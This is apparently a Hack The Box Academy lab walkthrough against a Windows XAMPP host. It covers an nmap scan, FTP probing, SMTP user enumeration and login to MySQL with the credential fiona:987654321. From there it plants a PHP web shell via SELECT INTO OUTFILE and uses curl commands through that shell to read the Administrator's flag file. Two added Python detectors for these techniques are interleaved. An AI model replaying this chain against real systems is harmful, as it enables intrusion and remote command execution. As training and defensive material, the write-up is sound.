First, we need to determine which services are running on the target:

sasoridevops@DG1-NguyenNA3:/mnt/d/nnatts_devops/Private/HTB/HTB_Academy$ sudo nmap -sV -sC 10.129.203.7
[sudo] password for sasoridevops:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-16 14:39 +07
Nmap scan report for 10.129.203.7
Host is up (0.23s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp
|_ssl-date: 2025-06-16T07:41:29+00:00; +2s from scanner time.
| fingerprint-strings:
|   GenericLines:
|     220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
|     Command unknown, not supported or not allowed...
|     Command unknown, not supported or not allowed...
|   Help:
|     220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
|     214-The following commands are implemented
|     USER PASS ACCT QUIT PORT RETR
|     STOR DELE RNFR PWD CWD CDUP
|     NOOP TYPE MODE STRU
|     LIST NLST HELP FEAT UTF8 PASV
|     MDTM REST PBSZ PROT OPTS CCC
|     XCRC SIZE MFMT CLNT ABORT
|     HELP command successful
|   NULL:
|     220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Not valid before: 2022-04-21T19:27:17
|_Not valid after: 2032-04-18T19:27:17
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
| 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
| http-title: Welcome to XAMPP
|_Requested resource was http://10.129.203.7/dashboard/
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
443/tcp  open  https         Core FTP HTTPS Server
|_http-title: Site doesn't have a title (text/html).
|_ssl-date: 2025-06-16T07:41:27+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Not valid before: 2022-04-21T19:27:17
|_Not valid after: 2032-04-18T19:27:17
|_http-server-header: Core FTP HTTPS Server
587/tcp  open  smtp          hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
| 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3306/tcp open  mysql         MySQL 5.5.5-10.4.24-MariaDB
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.4.24-MariaDB
|   Thread ID: 10
|   Capabilities flags: 63486
|   Some Capabilities: InteractiveClient, Speaks41ProtocolOld, Support41Auth, ConnectWithDatabase, IgnoreSigpipes, SupportsLoadDataLocal, FoundRows, IgnoreSpaceBeforeParenthesis, LongColumnFlag, Speaks41ProtocolNew, SupportsCompression, DontAllowDatabaseTableColumn, ODBCClient, SupportsTransactions, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: 'jb,TC3rh3bvKR;m8j/J
|   Auth Plugin Name: mysql_native_password
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EASY
| Not valid before: 2025-06-15T07:38:09
|_Not valid after: 2025-12-15T07:38:09
|_ssl-date: 2025-06-16T07:41:27+00:00; +2s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: WIN-EASY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.91 seconds

After that, we test each service in turn.

FTP Enumeration

sasoridevops@DG1-NguyenNA3:/mnt/d/nnatts_devops/Private/HTB/HTB_Academy$ ftp 10.129.203.7
Connected to 10.129.203.7.
220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
Name (10.129.203.7:sasoridevops):
331 password required for sasoridevops
Password:
500 PASS: command not understood
ftp: Login failed
ftp>
ftp> exit
221-
221 Goodbye

SMTP Enumeration

Another command:

./smtp-user-enum.pl -M RCPT -U ../users/users.list -t 10.129.203.7 -D inlanefreight.htb
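Seen from the mail server's side, RCPT-based enumeration shows up as one client collecting a run of rejected recipients. The detection logic below is an added example, not part of the original write-up; the log layout, the sample lines and the `enumeration_suspects` helper are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample log. The "<time> <client-ip> <C|S>: <text>" layout is an
# assumption for this example, not the format of any particular mail server.
SAMPLE_LOG = """\
14:50:01 198.51.100.23 C: MAIL FROM:<probe@example.test>
14:50:01 198.51.100.23 S: 250 OK
14:50:02 198.51.100.23 C: RCPT TO:<admin@inlanefreight.htb>
14:50:02 198.51.100.23 S: 550 Unknown user
14:50:02 198.51.100.23 C: RCPT TO:<backup@inlanefreight.htb>
14:50:02 198.51.100.23 S: 550 Unknown user
14:50:03 198.51.100.23 C: RCPT TO:<fiona@inlanefreight.htb>
14:50:03 198.51.100.23 S: 250 OK
14:50:03 198.51.100.23 C: RCPT TO:<guest@inlanefreight.htb>
14:50:03 198.51.100.23 S: 550 Unknown user
14:52:10 192.0.2.10 C: RCPT TO:<fiona@inlanefreight.htb>
14:52:10 192.0.2.10 S: 250 OK
""".splitlines()

LINE_RE = re.compile(r"^(\S+) (\S+) ([CS]): (.*)$")
# Commands whose reply reveals whether a mailbox exists.
PROBE_RE = re.compile(r"^(?:RCPT TO:\s*<?|VRFY\s+<?|EXPN\s+<?)([^>\s]+)", re.I)

def enumeration_suspects(lines, threshold=3):
    """Return clients with >= threshold distinct rejected mailbox probes."""
    pending = {}                      # client -> mailbox awaiting a reply
    rejected, accepted = defaultdict(set), defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        _, src, side, text = m.groups()
        if side == "C":
            probe = PROBE_RE.match(text)
            pending[src] = probe.group(1).lower() if probe else None
        elif pending.get(src):
            mailbox = pending.pop(src)
            bucket = rejected if text.startswith("5") else accepted
            bucket[src].add(mailbox)
    return {src: {"rejected": sorted(r), "confirmed": sorted(accepted[src])}
            for src, r in rejected.items() if len(r) >= threshold}

if __name__ == "__main__":
    for src, hits in enumeration_suspects(SAMPLE_LOG).items():
        print(src, hits)
```

The `confirmed` list matters most for response: those are the mailboxes the client now knows exist, so they are the accounts to watch for follow-on password guessing.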

Make sure to find the credential fiona:987654321.

Then continue by logging in to MySQL:

mysql -h 10.129.203.7 -u fiona -p987654321 --ssl-mode=DISABLED

This is possible because, after logging in over FTP, we can get some information about the target.

Next, write a web shell:

SELECT "" INTO OUTFILE 'C:\\xampp\\htdocs\\test2.php';
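The `INTO OUTFILE` write above is visible in the database query log. This added example (not from the original write-up) flags statements that write under a web root or with a script extension; the sample queries and helper names are constructed, and the web root is the XAMPP path shown on this page.

```python
import ntpath
import re

# Assumptions for this example: the web root is the XAMPP path used on this
# page; the extension list is illustrative, not exhaustive.
WEB_ROOTS = [r"C:\xampp\htdocs"]
SCRIPT_EXTS = {".php", ".phtml", ".phar", ".asp", ".aspx", ".jsp"}

# Constructed (user, statement) pairs standing in for a MySQL query log.
SAMPLE_QUERIES = [
    ("report", r"SELECT * FROM orders INTO OUTFILE 'D:\\exports\\orders.csv'"),
    ("fiona", r"""SELECT "" INTO OUTFILE 'C:\\xampp\\htdocs\\test2.php';"""),
    ("fiona", "SELECT 1 INTO DUMPFILE 'c:/XAMPP/tmp/../htdocs/img/a.txt'"),
]

OUTFILE_RE = re.compile(r"INTO\s+(?:OUT|DUMP)FILE\s+(['\"])(.+?)\1", re.I | re.S)

def normalise(path):
    """Collapse doubled backslashes, '..' segments, '/' and case differences."""
    return ntpath.normcase(ntpath.normpath(path.replace("\\\\", "\\")))

def is_under(path, root):
    root = normalise(root)
    return path == root or path.startswith(root + "\\")

def check_statement(sql):
    """Return [(normalised_path, [reasons])] for risky file writes in sql."""
    findings = []
    for match in OUTFILE_RE.finditer(sql):
        path = normalise(match.group(2))
        reasons = []
        if any(is_under(path, root) for root in WEB_ROOTS):
            reasons.append("web-root")
        if ntpath.splitext(path)[1] in SCRIPT_EXTS:
            reasons.append("script-extension")
        if reasons:
            findings.append((path, reasons))
    return findings

def scan(queries):
    """Return (user, path, reasons) for every flagged statement."""
    return [(user, path, reasons)
            for user, sql in queries
            for path, reasons in check_statement(sql)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_QUERIES):
        print(hit)
```

Setting `secure_file_priv` to a directory outside the web root and revoking the `FILE` privilege from application accounts prevents the write in the first place.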

After writing the file, we can execute commands through the web shell:

curl -k -u fiona:987654321 "http://inlanefreight.htb/test2.php?c=dir C:\\Users\\Administrator\\Desktop"

curl -k -u fiona:987654321 "http://inlanefreight.htb/test2.php?c=type C:\\Users\\Administrator\\Desktop\\flag.txt"

flag: HTB{t#3r3_4r3_tw0_w4y$_t0_93t_t#3_fl49}